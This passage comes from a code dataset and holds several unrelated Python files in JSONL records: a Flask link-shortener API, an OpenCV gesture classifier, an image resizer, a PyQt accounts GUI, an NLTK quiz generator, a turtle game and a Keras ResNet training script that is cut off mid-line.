long_url=data['long_url']\r\n stub=data.get('stub')\r\n title=data.get('title')\r\n disabled=data.get('disabled')\r\n utm_source=data.get('utm_source')\r\n utm_medium=data.get('utm_medium')\r\n utm_campaign=data.get('utm_campaign')\r\n utm_term=data.get('utm_term')\r\n utm_content=data.get('utm_content')\r\n password_hash=data.get('password_hash') \r\n expire_on=data.get('expire_on')\r\n\r\n link = load_link(id)\r\n if 'stub' in data:\r\n link.stub=stub\r\n if 'long_url' in data:\r\n link.long_url=long_url \r\n if 'title' in data:\r\n link.title=title\r\n if 'disabled' in data:\r\n link.disabled=disabled\r\n if 'utm_source' in data:\r\n link.utm_source=utm_source\r\n if 'utm_medium' in data:\r\n link.utm_medium=utm_medium\r\n if 'utm_campaign' in data:\r\n link.utm_campaign=utm_campaign\r\n if 'utm_content' in data:\r\n link.utm_content=utm_content\r\n if 'utm_term' in data:\r\n link.utm_term=utm_term\r\n if 'password_hash' in data:\r\n link.password_hash=password_hash\r\n if 'expire_on' in data:\r\n link.expire_on=expire_on\r\n # db.session.query(Link).filter_by(id=id).update(stub=stub,long_url=long_url, title=title, disabled=disabled, utm_source=utm_source, utm_medium=utm_medium, utm_campaign=utm_campaign, utm_content=utm_content, utm_term=utm_term, password_hash=password_hash, expire_on=expire_on)\r\n # db.session.update()\r\n db.session.commit()\r\n\r\n return jsonify(\r\n link = link.to_json(),\r\n message = 'Update Link Successful',\r\n status = 201\r\n ), 201\r\n except Exception as e:\r\n return jsonify(\r\n message = f'Update Link Failed {e}',\r\n status = 400\r\n ), 400\r\n\r\n@links_bp.route('/links/delete/', methods = ['DELETE'])\r\n@login_required2()\r\n@cross_origin(supports_credentials=True)\r\ndef delete(id):\r\n '''This method is called when the user requests to delete the link. Only the link id is required to delete the deck.'''\r\n try:\r\n db.session.query(Link).filter_by(id=id).delete()\r\n db.session.commit()\r\n return jsonify(\r\n message = 'Delete link Successful',\r\n status = 200\r\n ), 200\r\n except Exception as e:\r\n return jsonify(\r\n message = f'Delete link Failed {e}',\r\n status = 400\r\n ), 400\r\n \r\n \r\n@links_bp.route('/links/stats', methods = ['GET'])\r\n@login_required2()\r\n@cross_origin(supports_credentials=True)\r\ndef get_link_stats():\r\n '''This method is called when we want to fetch the stats of all the links of a particular user. Here, we check if the user is authenticated.'''\r\n args = request.args\r\n user_id = args and args['user_id']\r\n try:\r\n total_count = db.session.query(Link).join(User).filter(User.id==user_id).count()\r\n total_enabled = db.session.query(Link).join(User).filter(and_(User.id==user_id, Link.disabled==False)).count()\r\n total_disabled = db.session.query(Link).join(User).filter(and_(User.id==user_id, Link.disabled==True)).count()\r\n total_engagements = db.session.query(Engagements).join(Link).filter(Link.user_id==user_id).count()\r\n \r\n return jsonify(\r\n links = ({'total_count': total_count, 'total_enabled': total_enabled, 'total_disabled': total_disabled, 'total_engagements': total_engagements}),\r\n message = 'Fetching links successfully',\r\n status = 200\r\n ), 200\r\n except Exception as e:\r\n return jsonify(\r\n message = f\"An error occurred {e}\",\r\n status = 400\r\n ), 400\r\n \r\n@links_bp.route('/links//engagements', methods = ['GET'])\r\n@login_required2()\r\n@cross_origin(supports_credentials=True)\r\ndef get_single_link_engagements(link_id):\r\n '''This method is routed when the user requests analytics for a single link.'''\r\n try:\r\n engagements = db.session.query(Engagements).join(Link).filter(Link.id==link_id).all()\r\n _engagements = []\r\n for item in engagements:\r\n _engagements.append(item.to_json())\r\n return jsonify(\r\n engagements = _engagements,\r\n message = 'Fetching Analytics data successfully',\r\n status = 200\r\n ), 200\r\n except Exception as e:\r\n return jsonify(\r\n links = [],\r\n message = f'Fetching Analytics failed {e}',\r\n status = 400\r\n ), 400\r\n\r\n@links_bp.route('/links/engagements//create', methods = ['POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef create_engagement(link_id):\r\n '''This method is routed when the user requests to create a new engagement for a link.'''\r\n try:\r\n data = request.get_json()\r\n utm_source=data.get('utm_source')\r\n utm_medium=data.get('utm_medium')\r\n utm_campaign=data.get('utm_campaign')\r\n utm_term=data.get('utm_term')\r\n utm_content=data.get('utm_content')\r\n\r\n engagement = Engagements(link_id=link_id, utm_source=utm_source, utm_medium=utm_medium,utm_campaign=utm_campaign, utm_term=utm_term, utm_content=utm_content)\r\n db.session.add(engagement)\r\n db.session.commit()\r\n\r\n return jsonify(\r\n engagement = engagement.to_json(),\r\n message = 'Create Engagement Successful',\r\n status = 201\r\n ), 201\r\n except Exception as e:\r\n return jsonify(\r\n message = f'Create Engagement Failed {e}',\r\n status = 400\r\n ), 400\r\n","sub_path":"backend/src/routes/links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":13030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"61260080","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport random\nimport imutils\nfrom directkeys import PressKey, ReleaseKey, W, A, S, D\n\nPressKey(W)\n\nimg_array = np.empty((1, 200*80))\nimg_label = np.empty((1))\n#directory = \"D:/Machine Learning A-Z™ Hands-On Python & R In Data Science/practice/\"\nCATEGORIES = [\"up\", \"down\", \"left\", \"right\"]\nfor category in CATEGORIES: \n path = category \n for img in os.listdir(path): \n im = os.path.join(path, img)\n image = cv2.imread(im)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray = cv2.resize(gray, (200, 80))\n gray = np.reshape(gray, (1, 200*80))\n img_array = np.append(img_array, gray, axis = 0)\n img_label = np.append(img_label, CATEGORIES.index(category))\n\nimg_array = np.delete(img_array, (0), axis=0)\nimg_label = np.delete(img_label, (0), axis=0)\n\nfrom sklearn.model_selection import train_test_split\ntrain_X, test_X, train_Y, test_Y = train_test_split(img_array, img_label, test_size = 0.1, random_state = 1)\n\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\ntrain_X = sc.fit_transform(train_X)\ntest_X = sc.transform(test_X)\n\nfrom sklearn.ensemble import RandomForestClassifier\nclassifier = RandomForestClassifier(n_estimators = 10, criterion = 'entropy', random_state = 0)\nclassifier.fit(train_X, train_Y)\n\n# Predicting the Test set results\ny_pred = classifier.predict(test_X)\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(test_Y, y_pred)\nprint(cm)\n\ncap = cv2.VideoCapture(0)\nwhile True:\n _, frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n thresh_delta = cv2.threshold(gray, 160, 255, cv2.THRESH_BINARY)[1]\n thresh_delta = cv2.dilate(thresh_delta, None, iterations=1)\n contours, hierarchy = cv2.findContours(thresh_delta, cv2.RETR_EXTERNAL, \n cv2.CHAIN_APPROX_NONE)\n for cnt in contours:\n i=0\n if cv2.contourArea(cnt) > 7500:\n x, y, w, h = cv2.boundingRect(cnt)\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),thickness=7)\n cropped = thresh_delta[y:y + h, x:x + w] #cropping region of interest i.e. face area from image\n cropped2=cv2.resize(cropped,(200,80))\n Y_img = np.reshape(cropped2, (1, 200*80))\n Y_pred = classifier.predict(Y_img)\n print(Y_pred)\n print(int(Y_pred[i]))\n cv2.putText(frame, CATEGORIES[int(Y_pred[i])], (int(x), int(y)), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2)\n '''if CATEGORIES[int(Y_pred[i])] == CATEGORIES[0]:\n PressKey(W)\n ReleaseKey(W)\n elif CATEGORIES[int(Y_pred[i])] == CATEGORIES[1]:\n PressKey(S)\n ReleaseKey(S)\n elif CATEGORIES[int(Y_pred[i])] == CATEGORIES[2]:\n PressKey(A)\n ReleaseKey(A)\n elsif CATEGORIES[int(Y_pred[i])] == CATEGORIES[3]:\n PressKey(D)\n ReleaseKey(D) ''' \n i = i + 1\n cv2.imshow('frame', frame)\n cv2.imshow('thresh', thresh_delta)\n\n k = cv2.waitKey(1)\n \n if k == ord(\"q\"):\n break\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"untitled0.py","file_name":"untitled0.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"68840139","text":"from PIL import Image\nimport os\n\ndef folderImageShrink(directoryPath):\n filenames = os.listdir(directoryPath)\n\n for i in range(len(filenames)):\n oldImageName = filenames[i]\n oldImagePath = directoryPath + \"/\" + oldImageName\n oldImage = Image.open(oldImagePath)\n sizeImage = oldImage.size\n width = sizeImage[0]\n height = sizeImage[1]\n resizeImage = oldImage.resize((int(width/2), int(height/2)))\n newImagePath = oldImagePath.rstrip('.jpg') + '_new' + '.jpg'\n resizeImage.save(newImagePath)\n\n#folderImageShrink('C:/Users/wyattshapiro/Pictures/Python Pictures')\n","sub_path":"resizeImage.py","file_name":"resizeImage.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"169756493","text":"import os\nimport sys\n\nfrom PyQt4 import QtCore, QtGui, uic\n\nfrom file_database_api import Files\nfrom gui_frame import Frame\nfrom gui_get_database_type import GetDatabaseType\nfrom gui_get_start_date import GetStartDate\nfrom gui_add_remove_account import AddRemoveAccount\nfrom gui_add_remove_entry import AddRemoveEntry\nfrom static_functions import date_serializer, date_placeholder_text, error_message\n\n__author__ = 'Gareth Mok'\n\nform_main = uic.loadUiType('main.ui')[0]\n\n\nclass MainWindow(QtGui.QMainWindow, form_main):\n def __init__(self, parent=None):\n QtGui.QMainWindow.__init__(self, parent)\n self.setupUi(self)\n\n self.last_session = Files('last_open.json')\n if not self.last_session.empty():\n if os.path.isdir(self.last_session.get_directory()):\n self.directory = self.last_session.get_directory()\n else:\n if getattr(sys, 'frozen', False): # frozen\n self.directory = os.path.dirname(os.path.realpath(sys.executable))\n else: # unfrozen\n self.directory = os.path.dirname(os.path.realpath(__file__))\n self.last_session.add_update(\"Directory\", self.directory)\n\n file_list = self.last_session.grab()\n sorted_names = sorted(file_list)\n for i, name in enumerate(sorted_names):\n if os.path.isfile(file_list[name]):\n new_tab = Frame(file_list[name], self)\n self.FileList.addTab(new_tab, name)\n self.act_refresh_accounts_triggered()\n else:\n self.last_session.remove(name)\n else:\n if getattr(sys, 'frozen', False): # frozen\n self.directory = os.path.dirname(os.path.realpath(sys.executable))\n else: # unfrozen\n self.directory = os.path.dirname(os.path.realpath(__file__))\n self.last_session.add_update(\"Directory\", self.directory)\n\n if self.FileList.currentWidget():\n self.FileList.currentWidget().tableAccountData.setFocus()\n\n self.connect_components()\n self.initialize_shortcuts()\n\n def connect_components(self):\n self.act_New.triggered.connect(self.act_new_triggered)\n self.act_Open.triggered.connect(self.act_open_triggered)\n self.act_Close_Tab.triggered.connect(self.act_close_tab_triggered)\n self.act_Change_Default_Directory.triggered.connect(self.act_change_default_account_directory_triggered)\n self.act_Change_Start_Date.triggered.connect(self.act_change_start_date_triggered)\n self.act_Exit.triggered.connect(self.act_exit_triggered)\n self.act_Refresh_Accounts.triggered.connect(self.act_refresh_accounts_triggered)\n self.act_Add_Account.triggered.connect(self.act_add_account_triggered)\n self.act_Add_Entry.triggered.connect(self.act_add_entry_triggered)\n self.act_Remove_Account.triggered.connect(self.act_remove_account_triggered)\n self.act_Remove_Entry.triggered.connect(self.act_remove_entry_triggered)\n self.FileList.currentChanged.connect(self.act_refresh_accounts_triggered)\n\n def initialize_shortcuts(self):\n QtGui.QShortcut(QtGui.QKeySequence(QtCore.Qt.CTRL + QtCore.Qt.Key_Tab),\n self, self.next_tab)\n QtGui.QShortcut(QtGui.QKeySequence(QtCore.Qt.CTRL + QtCore.Qt.SHIFT + QtCore.Qt.Key_Tab),\n self, self.previous_tab)\n\n def next_tab(self):\n new_index = (self.FileList.currentIndex() + 1) % self.FileList.count()\n self.FileList.setCurrentIndex(new_index)\n\n def previous_tab(self):\n new_index = self.FileList.currentIndex() - 1\n if new_index == -1:\n new_index = self.FileList.count() - 1\n self.FileList.setCurrentIndex(new_index)\n\n def act_new_triggered(self):\n \"\"\"\n Creates a new account database and opens it in a new tab\n :return:\n \"\"\"\n filename = QtGui.QFileDialog.getSaveFileName(QtGui.QFileDialog(), 'New file', self.directory, '*.json')\n if filename != '':\n database_type, ok = GetDatabaseType.get_database_type(self)\n if ok and database_type != '':\n start_date, ok = GetStartDate.get_start_date(date_placeholder_text(database_type),self)\n if ok and start_date != '':\n base_filename = os.path.basename(filename)\n\n try:\n new_tab = Frame(filename, database_type, date_serializer(database_type, start_date), self)\n\n self.FileList.addTab(new_tab, base_filename)\n self.FileList.setCurrentIndex(self.FileList.count() - 1)\n self.FileList.currentWidget().display_accounts()\n self.last_session.add_update(base_filename, filename)\n except ValueError as ve:\n error_message(ve)\n\n def act_open_triggered(self):\n \"\"\"\n Opens a file in current tab or new tab\n :return:\n \"\"\"\n filename = QtGui.QFileDialog.getOpenFileName(QtGui.QFileDialog(), 'Open file', self.directory, '*.json')\n if filename != '':\n base_filename = os.path.splitext(os.path.basename(filename))[0]\n\n for i in range(self.FileList.count()):\n text = str(self.FileList.tabText(i))\n if text == base_filename:\n self.FileList.setCurrentIndex(i)\n self.FileList.currentWidget().display_accounts()\n break\n else:\n new_tab = Frame(filename, self)\n self.FileList.addTab(new_tab, base_filename)\n self.FileList.setCurrentIndex(self.FileList.count() - 1)\n self.FileList.currentWidget().display_accounts()\n self.last_session.add_update(base_filename, filename)\n\n def act_close_tab_triggered(self):\n current = self.FileList.currentIndex()\n self.last_session.remove(str(self.FileList.tabText(current)))\n self.FileList.removeTab(current)\n\n def act_change_default_account_directory_triggered(self):\n self.directory = QtGui.QFileDialog.getExistingDirectory(QtGui.QFileDialog(), None,\n 'Choose Account Database Directory')\n self.last_session.add_update(\"Directory\", self.directory)\n\n def act_change_start_date_triggered(self):\n if self.FileList.currentWidget():\n self.FileList.currentWidget().display_accounts()\n\n database_type = self.FileList.currentWidget().data.get_type()\n start_date, ok = GetStartDate.get_start_date(date_placeholder_text(database_type), self)\n if ok and start_date:\n try:\n self.FileList.currentWidget().data.set_start_date(date_serializer(database_type, start_date))\n except ValueError as ve:\n error_message(ve)\n self.FileList.currentWidget().display_accounts()\n\n def act_exit_triggered(self):\n self.close()\n\n def act_refresh_accounts_triggered(self):\n if self.FileList.currentWidget():\n self.FileList.currentWidget().display_accounts()\n\n def act_add_account_triggered(self):\n if self.FileList.currentWidget():\n self.FileList.currentWidget().display_accounts()\n name, skip, ok = AddRemoveAccount.get_account_details(\n self.FileList.currentWidget().data.grab_account_names(), False, self)\n if ok and name:\n self.FileList.currentWidget().data.add_account(name, skip)\n self.FileList.currentWidget().display_accounts()\n\n def act_add_entry_triggered(self):\n if self.FileList.currentWidget():\n self.FileList.currentWidget().display_accounts()\n database_type = self.FileList.currentWidget().data.get_type()\n name, date, money, ok = AddRemoveEntry.get_entry_details(\n self.FileList.currentWidget().data.grab_account_names(), 0, date_placeholder_text(database_type), self)\n if ok and name and date and money:\n try:\n self.FileList.currentWidget().data.add_entry(name, date_serializer(database_type, date), money)\n except ValueError as ve:\n error_message(ve)\n\n self.FileList.currentWidget().display_accounts()\n\n def act_remove_account_triggered(self):\n if self.FileList.currentWidget():\n self.FileList.currentWidget().display_accounts()\n name, skip, ok = AddRemoveAccount.get_account_details(\n self.FileList.currentWidget().data.grab_account_names(), True, self)\n if ok and name:\n self.FileList.currentWidget().data.remove_account(name)\n self.FileList.currentWidget().display_accounts()\n\n def act_remove_entry_triggered(self):\n if self.FileList.currentWidget():\n self.FileList.currentWidget().display_accounts()\n database_type = self.FileList.currentWidget().data.get_type()\n name, date, money, ok = AddRemoveEntry.get_entry_details(\n self.FileList.currentWidget().data.grab_account_names(), 1, date_placeholder_text(database_type), self)\n if ok and name and date:\n try:\n self.FileList.currentWidget().data.remove_entry(name, date_serializer(database_type, date))\n except ValueError as ve:\n error_message(ve)\n\n self.FileList.currentWidget().display_accounts()\n\n\ndef main():\n app = QtGui.QApplication(sys.argv)\n my_window = MainWindow(None)\n my_window.show()\n my_window.act_refresh_accounts_triggered()\n sys.exit(app.exec_())\n\nif __name__ == '__main__':\n main()\n","sub_path":"gui_main.py","file_name":"gui_main.py","file_ext":"py","file_size_in_byte":9906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"26301997","text":"\n# Import packages\nimport re\nimport nltk\nimport numpy as np\nfrom nltk.corpus import wordnet as wn\n\n\nclass ObjectiveTest:\n \"\"\"Class abstraction for objective test generation module\n \"\"\"\n\n def __init__(self, filepath):\n \"\"\"Class constructor\n \n Arguments:\n filepath {str} -- Absolute path to the corpus file\n \"\"\"\n try:\n with open(filepath, mode=\"r\") as fp:\n self.summary = fp.read()\n except FileNotFoundError as e:\n print(\"Warning raised at `ObjectiveTest.__init__`\", e)\n\n def get_trivial_sentences(self):\n \"\"\"Method to identify sentences with potential to create objective questions\n \n Returns:\n list -- Sentences with potential to create objective questions\n \"\"\"\n # Sentence tokenization\n sentences = nltk.sent_tokenize(self.summary)\n trivial_sentences = list()\n # Identify trivial sentences\n for sent in sentences:\n trivial = self.identify_trivial_sentences(sent)\n if trivial:\n trivial_sentences.append(trivial)\n else:\n continue\n return trivial_sentences\n\n def identify_trivial_sentences(self, sentence):\n \"\"\"Method to evaluate if a given sentence has the potential to generate an objective question.\n \n Arguments:\n sentence {str} -- String sequence generated from a `sentence_tokenizer`\n \n Returns:\n dict -- Question formed along with the correct answer in case of potential sentence\n else return `None`\n \"\"\"\n # If sentence starts with an adverb or is less than 4 words long probably not the best fit\n tags = nltk.pos_tag(sentence)\n if tags[0][1] == \"RB\" or len(nltk.word_tokenize(sentence)) < 4:\n return None\n \n # Extract noun phrases from the sentence\n noun_phrases = list()\n grammer = r\"\"\"\n CHUNK: {+*+}\n {+*+}\n {+*}\n \"\"\"\n chunker = nltk.RegexpParser(grammer)\n tokens = nltk.word_tokenize(sentence)\n pos_tokens = nltk.tag.pos_tag(tokens)\n tree = chunker.parse(pos_tokens)\n\n # Select phrase\n for subtree in tree.subtrees():\n if subtree.label() == \"CHUNK\":\n temp = \"\"\n for sub in subtree:\n temp += sub[0]\n temp += \" \"\n temp = temp.strip()\n noun_phrases.append(temp)\n \n # Replace nouns\n replace_nouns = []\n for word, _ in tags:\n for phrase in noun_phrases:\n if phrase[0] == '\\'':\n # If it starts with an apostrophe, ignore it\n # (this is a weird error that should probably be handled elsewhere)\n break\n if word in phrase:\n # Blank out the last two words in this phrase\n [replace_nouns.append(phrase_word) for phrase_word in phrase.split()[-2:]]\n break\n # If we couldn't find the word in any phrases\n if len(replace_nouns) == 0:\n replace_nouns.append(word)\n break\n \n if len(replace_nouns) == 0:\n # Return none if we found no words to replace\n return None\n \n val = 99\n for i in replace_nouns:\n if len(i) < val:\n val = len(i)\n else:\n continue\n \n trivial = {\n \"Answer\": \" \".join(replace_nouns),\n \"Key\": val\n }\n\n if len(replace_nouns) == 1:\n # If we're only replacing one word, use WordNet to find similar words\n trivial[\"Similar\"] = self.answer_options(replace_nouns[0])\n else:\n # If we're replacing a phrase, don't bother - it's too unlikely to make sense\n trivial[\"Similar\"] = []\n \n # Blank out our replace words (only the first occurrence of the word in the sentence)\n replace_phrase = \" \".join(replace_nouns)\n blanks_phrase = (\"__________\" * len(replace_nouns)).strip()\n # Compile regular expresession\n expression = re.compile(re.escape(replace_phrase), re.IGNORECASE)\n sentence = expression.sub(blanks_phrase, str(sentence), count=1)\n trivial[\"Question\"] = sentence\n return trivial\n\n @staticmethod\n def answer_options(word):\n \"\"\"Method to identify objective answer options\n \n Arguments:\n word {str} -- Actual answer to the question which is to be used for generating other deceiving options\n \n Returns:\n list -- Other answer options\n \"\"\"\n # In the absence of a better method, take the first synset\n synsets = wn.synsets(word, pos=\"n\")\n\n # If there aren't any synsets, return an empty list\n if len(synsets) == 0:\n return []\n else:\n synset = synsets[0]\n \n # Get the hypernym for this synset (again, take the first)\n hypernym = synset.hypernyms()[0]\n # Get some hyponyms from this hypernym\n hyponyms = hypernym.hyponyms()\n # Take the name of the first lemma for the first 8 hyponyms\n similar_words = []\n for hyponym in hyponyms:\n similar_word = hyponym.lemmas()[0].name().replace(\"_\", \" \")\n if similar_word != word:\n similar_words.append(similar_word)\n if len(similar_words) == 8:\n break\n return similar_words\n\n def generate_test(self, num_of_questions=3):\n \"\"\"Method to generate an objective test i.e., a set of questions and required options for answer.\n\n Arguments:\n num_of_questions {int} -- Integer denoting number of questions to set in the test.\n \n Returns:\n list, list -- A pair of lists containing questions and answer options respectively.\n \"\"\"\n trivial_pair = self.get_trivial_sentences()\n question_answer = list()\n for que_ans_dict in trivial_pair:\n if que_ans_dict[\"Key\"] > 3:\n question_answer.append(que_ans_dict)\n else:\n continue\n question = list()\n answer = list()\n while len(question) < num_of_questions:\n rand_num = np.random.randint(0, len(question_answer))\n if question_answer[rand_num][\"Question\"] not in question:\n question.append(question_answer[rand_num][\"Question\"])\n answer.append(question_answer[rand_num][\"Answer\"])\n else:\n continue\n return question, answer","sub_path":"src/objective.py","file_name":"objective.py","file_ext":"py","file_size_in_byte":6816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"562277331","text":"import os\nimport random\nimport turtle\nimport subprocess\nimport pygame\nimport time\n\n\n\n\n# quickfart = pygame.mixer.music(\"quickfart.mp3\")\n\nturtle.fd(0)\nturtle.speed(0)\nturtle.bgcolor(\"black\")\nturtle.ht()\nturtle.setundobuffer(1)\nturtle.tracer(1)\n\nclass Sprite(turtle.Turtle):\n def __init__(self, spriteshape, color, startx, starty):\n turtle.Turtle.__init__(self, shape = spriteshape)\n self.speed(0)\n self.penup()\n self.color(color)\n self.fd(0)\n self.goto(startx, starty)\n self.speed = 1\n\n def move(self):\n self.fd(self.speed)\n \n #boundary detection\n if self.xcor() > 290:\n self.setx(290)\n self.rt(60)\n if self.xcor() < -290:\n self.setx(-290)\n self.rt(60)\n if self.ycor() > 290:\n self.sety(290)\n self.rt(60)\n if self.ycor() < -290:\n self.sety(-290)\n self.rt(60)\n\n #check sprite collision\n def is_collision(self, other):\n if (self.xcor() >= (other.xcor() - 20)) and \\\n (self.xcor() <= (other.xcor() + 20)) and \\\n (self.ycor() >= (other.ycor() - 20)) and \\\n (self.ycor() <= (other.ycor() + 20)):\n return True\n else:\n return False\n\n \n\nclass Player(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.speed = 4\n self.lives = 3\n\n\n def turn_left(self):\n self.lt(45)\n \n def turn_right(self):\n self.rt(45)\n\n def accelerate(self):\n self.speed += 1\n\n def decelerate(self):\n self.speed -= 1\n\nclass Enemy(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.speed = 6\n self.setheading(random.randint(0, 360))\n\nclass Ally(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.speed = 8\n self.setheading(random.randint(0, 360))\n\n def move(self):\n self.fd(self.speed)\n \n #boundary detection\n if self.xcor() > 290:\n self.setx(290)\n self.lt(60)\n if self.xcor() < -290:\n self.setx(-290)\n self.lt(60)\n if self.ycor() > 290:\n self.sety(290)\n self.lt(60)\n if self.ycor() < -290:\n self.sety(-290)\n self.lt(60)\n \nclass Missile(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.shapesize(stretch_wid = 0.3, stretch_len = 0.4, outline=None)\n self.speed = 20\n self.status = \"ready\"\n #self.goto(-1000, 1000)\n \n\n def fire(self):\n if self.status == \"ready\":\n #Play missile sound\n #os.system(\"afplay quickfart.wav&\")\n #pygame.init()\n pygame.mixer.music.load(\"quickfart.wav\")\n pygame.mixer.music.play()\n time.sleep(2)\n pygame.mixer.music.stop()\n \n self.goto(player.xcor(), player.ycor())\n self.setheading(player.heading())\n self.status = \"firing\"\n\n def move(self):\n if self.status == \"ready\":\n self.goto(1000, -1000)\n \n \n if self.status == \"firing\":\n self.fd(self.speed)\n\n #border check\n if self.xcor() > 290 or self.xcor() < -290 or\\\n self.ycor() > 290 or self.ycor() < -290:\n self.goto(-1000, 1000)\n self.status = \"ready\"\n\n\n\nclass Game():\n def __init__(self):\n self.level = 1\n self.score = 0\n self.state = \"playing\"\n self.pen = turtle.Turtle()\n self.lives = 3\n\n def draw_border(self):\n #draw border\n self.pen.speed(0)\n self.pen.color(\"white\")\n self.pen.pensize(3)\n self.pen.penup()\n self.pen.goto(-300, 300)\n self.pen.pendown()\n for side in range(4):\n self.pen.fd(600)\n self.pen.rt(90)\n self.pen.penup()\n self.pen.ht()\n self.pen.pendown()\n\n def show_status(self):\n self.pen.undo()\n msg = \"Score: %s\" %(self.score)\n self.pen.penup()\n self.pen.goto(-300, 310)\n self.pen.write(msg, font=(\"Arial\", 16, \"normal\"))\n\n\n\n#create game object\ngame = Game()\n\n#draw the game border\ngame.draw_border()\n\n#show game status\ngame.show_status()\n\n\n#create my sprites\nplayer = Player(\"triangle\", \"white\", 0, 0)\n\nenemy = Enemy(\"circle\", \"red\", 100, 100)\n\nmissile = Missile(\"triangle\", \"yellow\", 1000, -1000)\n\nally = Ally(\"square\", \"blue\", 0, 0)\n\n#keyboard bindings\nturtle.onkey(player.turn_left, \"Left\")\nturtle.onkey(player.turn_right, \"Right\")\nturtle.onkey(player.accelerate, \"Up\")\nturtle.onkey(player.decelerate, \"Down\")\nturtle.onkey(missile.fire, \"space\")\nturtle.listen()\n\n\n#main game loop\nwhile True:\n\n enemy.move()\n player.move()\n missile.move()\n ally.move()\n\n\n #check for collision\n if player.is_collision(enemy):\n x = random.randint(-250, 250)\n y = random.randint(-250, 250)\n player.goto(x, y)\n player.setheading(random.randint(0, 360))\n game.score -= 100\n game.show_status()\n\n \n if missile.is_collision(enemy):\n x = random.randint(-250, 250)\n y = random.randint(-250, 250)\n enemy.goto(x, y)\n missile.status = \"ready\"\n enemy.setheading(random.randint(0, 360))\n #increase score\n game.score += 100\n game.show_status()\n \n if missile.is_collision(ally):\n x = random.randint(-250, 250)\n y = random.randint(-250, 250)\n ally.goto(x, y)\n missile.status = \"ready\"\n ally.setheading(random.randint(0, 360))\n #decrease score\n game.score -= 50\n game.show_status()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"pythonPractice/spaceWar.py","file_name":"spaceWar.py","file_ext":"py","file_size_in_byte":6082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"87168164","text":"\nfrom absl import flags\nfrom absl import app\n\nimport os\nimport tensorflow as tf\nimport numpy as np\n\nfrom tensorflow.keras import Input, Model\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, GlobalAveragePooling2D, Dropout, Dense, add\n\n#tf.enable_eager_execution()\n\n\nIMAGE_SHAPE = (32, 32, 3)\nNUM_CLASSES = 10\n\ndef toy_resnet_model():\n inputs = Input(shape=IMAGE_SHAPE, name='image')\n x = Conv2D(32, 3, activation='relu')(inputs)\n x = Conv2D(64, 3, activation='relu')(x)\n block_1_output = MaxPooling2D(3)(x)\n \n x = Conv2D(64, 3, activation='relu', padding='same')(block_1_output)\n x = Conv2D(64, 3, activation='relu', padding='same')(x)\n block_2_output = add([x, block_1_output])\n \n x = Conv2D(64, 3, activation='relu', padding='same')(x)\n x = Conv2D(64, 3, activation='relu', padding='same')(x)\n block_3_output = add([x, block_2_output])\n \n x = Conv2D(64, 3, activation='relu')(block_3_output)\n x = GlobalAveragePooling2D()(x)\n x = Dense(256, activation='relu')(x)\n x = Dropout(0.5)(x)\n outputs = Dense(10, activation='softmax')(x)\n \n model = Model(inputs, outputs, name='toy_resnet')\n \n return model\n\n\ndef prepare_datasets():\n def _parse_record(example_proto):\n features = {\n 'image': tf.FixedLenFeature([], tf.string),\n 'label': tf.FixedLenFeature([], tf.int64, default_value=0)\n }\n \n parsed_features = tf.parse_single_example(example_proto, features)\n image = parsed_features['image']\n label = parsed_features['label']\n \n image = tf.image.decode_png(image, channels=3)\n image = tf.cast(image, tf.float32)\n image = image / 255\n \n label = tf.one_hot(label, NUM_CLASSES)\n \n return image, label\n\n \n train_dataset = tf.data.TFRecordDataset(FLAGS.train_files)\n eval_dataset = tf.data.TFRecordDataset(FLAGS.eval_files)\n \n train_dataset = train_dataset.map(_parse_record)\n eval_dataset = eval_dataset.map(_parse_record)\n \n train_dataset = train_dataset.shuffle(4096).batch(FLAGS.batch_size).repeat()\n eval_dataset = eval_dataset.batch(FLAGS.batch_size).repeat()\n \n return train_dataset, eval_dataset\n\n\ndef train_evaluate():\n \n train_dataset, eval_dataset = prepare_datasets()\n \n model = toy_resnet_model()\n \n model.compile(optimizer=tf.keras.optimizers.RMSprop(1e-3),\n loss=\"categorical_crossentropy\",\n metrics=[\"accuracy\"]\n )\n\n callbacks = [\n #tf.keras.callbacks.TensorBoard(log_dir=FLAGS['job-dir'].value, update_freq='epoch')\n tf.keras.callbacks.TensorBoard(log_dir=FLAGS['job-dir'].value)\n ]\n \n model.fit(train_dataset,\n epochs=FLAGS.epochs,\n steps_per_epoch=1000,\n #callbacks=callbacks,\n validation_data=eval_dataset,\n validation_steps=200)\n \n \n\nFLAGS = flags.FLAGS\nflags.DEFINE_list(\"train_files\", None, \"Training TFRecord files\")\nflags.DEFINE_list(\"eval_files\", None, \"Evaluation TFRecord files\")\n\nflags.DEFINE_integer(\"epochs\", 5, \"Number of epochs to train\")\nflags.DEFINE_integer(\"batch_size\", 32, \"Batch 